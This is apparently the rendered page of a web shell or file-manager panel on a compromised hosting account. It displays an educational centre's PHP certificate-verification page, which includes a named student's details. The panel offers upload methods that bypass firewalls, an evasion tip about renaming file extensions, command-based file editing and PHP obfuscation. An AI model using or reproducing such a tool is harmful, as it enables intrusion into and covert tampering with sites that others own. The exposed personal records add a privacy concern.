Search
Search
Search
Search
Information
Information
Light
Dark
Open actions menu
Basic upload method
Bypass upload method
Tips!
If you encounter an error (by firewall) while uploading using both methods,
try changing extension of the file before uploading it and rename it right after.
This uploader supports multiple file upload.
Submit
~
home
u148414079
domains
rnnycindia.org
public_html
rnnyc
File Name:
<?php include "header.php"; ?> <style> .heading{ border-radius:5px; padding:5px; } .certificate-div{ margin-top:80px; background-image:url('assets/img/certificate-blank.png'); height: 1000px; background-position: center; background-repeat: no-repeat; background-size: contain; } .inside-div{ width:56%; margin:auto; padding-top:5%; } .mt-40p{ margin-top:40%; } .title{ color:black; font-family:Century Schoolbook; } .mb-25x{ margin-bottom:25px; } .mt-20x{ margin-top:20px; } .mb-30x{ margin-bottom:30px; } .golden-seal-pic{ width:100px; height:100px; margin-top:40px; margin-left:490px; } .director-stamp-pic{ width:100px; height:100px; margin-left:40px; } .border-red{ border-color:red; } .required-msg{ color:red; font-size:13px; } @media (max-width:1115px){ .inside-div{ width:65%; margin:auto; padding-top:5%; } } @media (max-width:991px){ .inside-div{ width:82%; margin:auto; padding-top:11%; } } </style> <section id="mu-page-breadcrumb"> <div class="container"> <div class="row"> <div class="col-md-12"> <div class="mu-page-breadcrumb-area"> <h2>Certificate Verify</h2> <ol class="breadcrumb"> <li><a href="#">Home</a></li> <li class="active">Certificate Verify</li> </ol> </div> </div> </div> </div> </section> <section id="mu-about-us"> <div class="container"> <div class="row"> <div class="col-md-12"> <div class="mu-about-us-area"> <div class="mu-about-us-left"> <div class="row"> <div class="col-sm-3"></div> <div class="col-sm-6"> <h4 align="center" class="bg-primary heading">Certificate Verification</h4><br><br> <form> <div class="form-group"> <div class="row"> <div class="col-sm-4"> <label>Certificate No.</label> </div> <div class="col-sm-8"> <input type="text" class="form-control border-red"> <span class="required-msg">SID/Certificate No. is required</span> </div> </div> </div> <div class="form-group"> <div class="row"> <div class="col-sm-4"> <label>Year of Passing</label> </div> <div class="col-sm-8"> <input type="text" class="form-control border-red"> <span class="required-msg">Year of Passing is required</span> </div> </div> </div><br> <div align="center"><button type="submit" class="btn btn-primary">Submit</button></div> </form> </div> <div class="col-sm-3"></div> </div> <div class="certificate-div" style="display:none"> <div class="inside-div"> <h5 align="right"><b>Registration No. 67890087</b></h5> <div class="row mt-40p"> <div class="col-xs-5"> <h4 class="title mb-25x mt-20x"><b>This is to Certify that</b></h4> <h4 class="title"><b>Father/Guardian's Name</b></h4> </div> <div class="col-xs-5"> <h4 class="mb-25x mt-20x"><b>MARUFUDDIN DHABAK</b></h4> <h4><b>SIRAJUL DHABAK</b></h4> </div> <div class="col-xs-2"> <img src="assets/img/passport.jpg" class="img-responsive"> </div> </div> <div class="row"> <div class="col-xs-5"> <h4 class="title mb-25x"><b>SID/Certificate Verify No.</b></h4> <h4 class="title mb-25x"><b>Course Name</b></h4> <h4 class="title mb-25x"><b>Duration of Training</b></h4> <h4 class="title"><b>Study Centre</b></h4> </div> <div class="col-xs-7"> <h4 class="mb-30x"><b>700194-55</b></h4> <h5 class="mb-30x"><b>Advanced Diploma in Computer Application</b></h5> <h5 class="mb-30x"><b>December - 2019 to November - 2020</b></h5> <h5><b>Ramnagar Rabindra Nath National Youth Centre Vill+PO- Ramnagar, PS- Hanskhali, Dist- Nadia, Pin- 741502, West Bengal</b></h5> </div> </div> <h4 class="title"><b>He/She has successfully completed above mentioned course with Grade A.</b></h4> <img src="assets/img/stamp-demo.jpg" class="golden-seal-pic"> <img src="assets/img/stamp-demo.jpg" class="director-stamp-pic"> </div> </div> </div> </div> </div> </div> </div> </section> <?php include "footer.php"; ?>
Bypass Options
Select edit method
Using basic write file
Using command
Info
Info!
If the strings too long, it will be failed to edit file (command method only).
Obfuscate PHP:
No Obfuscate
Obfuscate
Save Changes